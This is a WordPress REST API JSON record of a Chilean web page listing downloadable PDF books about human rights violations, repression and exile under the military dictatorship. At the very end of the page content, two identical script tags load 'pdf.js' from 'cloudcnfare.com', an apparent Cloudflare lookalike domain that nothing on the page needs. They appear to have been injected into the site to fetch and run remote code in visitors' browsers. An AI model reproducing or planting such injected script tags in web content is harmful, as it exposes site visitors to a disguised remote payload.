{"id":446,"date":"2015-04-12T17:39:42","date_gmt":"2015-04-12T20:39:42","guid":{"rendered":"http:\/\/www.probidadenchile.cl\/wp\/?page_id=446"},"modified":"2018-07-16T11:46:41","modified_gmt":"2018-07-16T14:46:41","slug":"libros-sobre-derechos-humanos","status":"publish","type":"page","link":"https:\/\/www.probidadenchile.cl\/wp\/libros\/libros-sobre-derechos-humanos\/","title":{"rendered":"Libros sobre Derechos Humanos"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00a0Se incluyen libros escritos durante el per\u00edodo de la dictadura militar. Algunos de ellos no est\u00e1n disponibles .<\/span><br \/>\n<span style=\"color: #000000;\">Se ha incluido &#8220;La represi\u00f3n en Chile, 1973-1989&#8221;,1992(Registro de Propiedad Intelectual 146.634).<\/span><br \/>\n<span style=\"color: #000000;\">Patricio Orellana Vargas y Elizabeth Quay Hutchison &#8220;El movimiento de derechos humanos en Chile, 1973-1990&#8221; (Registro de Propiedad Intelectual N\u00b0\u00a079.868)<\/span><br \/>\n<span style=\"color: #000000;\">El libro, publicado por FASIC en 1989:&#8221;Violaciones a los Derechos Humanos e informaci\u00f3n. La experiencia chilena&#8221; (Registro de Propiedad Intelectual N\u00b0 72.743). &#8220;Algunos aspectos cuantitativos de la situaci\u00f3n de los presos pol\u00edticos en Chile&#8221; editado por FASIC en 1988 (se presentan s\u00f3lo las 54 primeras p\u00e1ginas, ya que las restantes s\u00f3lo son gr\u00e1ficos de los mismos cuadros num\u00faricos). Se agreg\u00f3\u00a0como ap\u00e9ndice un dibujo y estad\u00edsticas sobre los presos pol\u00edticos de la \u00e9poca. En el 2007 se incorpor\u00f3 en PDF el libro &#8220;El exilio chileno&#8221;, escrito en 1981 en Inglaterra.<\/span><\/p>\n<ul>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LRCap1.pdf\"rel=\"\" target=\"_blank\">LA REPRESI\u00d3N EN CHILE 1, Cap. 1. INTRODUCCI\u00d3N <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-700\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/4-206x300.jpg\" alt=\"4\" width=\"108\" height=\"158\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/4-206x300.jpg 206w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/4.jpg 315w\" sizes=\"auto, (max-width: 108px) 100vw, 108px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-701\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/5-200x300.jpg\" alt=\"5\" width=\"103\" height=\"155\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/5-200x300.jpg 200w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/5.jpg 312w\" sizes=\"auto, (max-width: 103px) 100vw, 103px\" \/><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LRcap2.pdf\" target=\"_blank\">LA REPRESI\u00d3N EN CHILE 2, Cap. 2. EL SISTEMA REPRESIVO  <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LRCap3.pdf\" target=\"_blank\">LA REPRESI\u00d3N EN CHILE 3, Cap. 3. LA TORTURA <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LRCap4.pdf\" target=\"_blank\">LA REPRESI\u00d3N EN CHILE 4, Cap. 4. EJECUCIONES <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LRCap5.pdf\" target=\"_blank\">LA REPRESI\u00d3N EN CHILE 5, Cap. 5. PRIVACI\u00d3N DE LIBERTAD <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LRCap6.pdf\" target=\"_blank\">LA REPRESI\u00d3N EN CHILE 6, Cap. 6. AMEDRENTAMIENTOS <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LRCap7.pdf\" target=\"_blank\">LA REPRESI\u00d3N EN CHILE 7, CAP. 7. EXILIO Y DESEXILIO <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/acpp.pdf\" target=\"_blank\">Aspectos cuantitativos de la situaci\u00f3n de los Presos Pol\u00edtico\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/?p=155\">El Exilio Chileno<\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-743\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/Ldhhinfo.jpg\" alt=\"Ldhhinfo\" width=\"111\" height=\"154\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-744\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/Lexilio.jpg\" alt=\"Lexilio\" width=\"113\" height=\"155\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-745\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/LinfDH.jpg\" alt=\"LinfDH\" width=\"109\" height=\"157\" \/><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/Lexilio.jpg\"><br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/movimientoddhh.pdf\" target=\"_blank\">El Movimiento de Derechos Humanos en Chile 1973-1990\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/violdh.pdf\" target=\"_blank\">Violaciones a los Derechos Humanos e Informaci\u00f3n\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/><\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/CONTRADICTADURA_V052018.pdf\" rel=\"\">Contra la dictadura, mini memoria 1973-1992 <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-645\" src=\"http:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png\" alt=\"pdf-icon2\" width=\"20\" height=\"20\" srcset=\"https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2.png 256w, https:\/\/www.probidadenchile.cl\/wp\/wp-content\/uploads\/pdf-icon2-150x150.png 150w\" sizes=\"auto, (max-width: 20px) 100vw, 20px\" \/>\u00a0<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0Se incluyen libros escritos durante el per\u00edodo de la dictadura militar. Algunos de ellos no est\u00e1n disponibles . Se ha incluido &#8220;La represi\u00f3n en Chile, 1973-1989&#8221;,1992(Registro de Propiedad Intelectual 146.634). Patricio Orellana Vargas y Elizabeth Quay Hutchison &#8220;El movimiento de derechos humanos en Chile, 1973-1990&#8221; (Registro de Propiedad Intelectual N\u00b0\u00a079.868) El libro, publicado por FASIC [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1285,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-446","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/comments?post=446"}],"version-history":[{"count":13,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/446\/revisions"}],"predecessor-version":[{"id":1282,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/446\/revisions\/1282"}],"up":[{"embeddable":true,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/1285"}],"wp:attachment":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/media?parent=446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}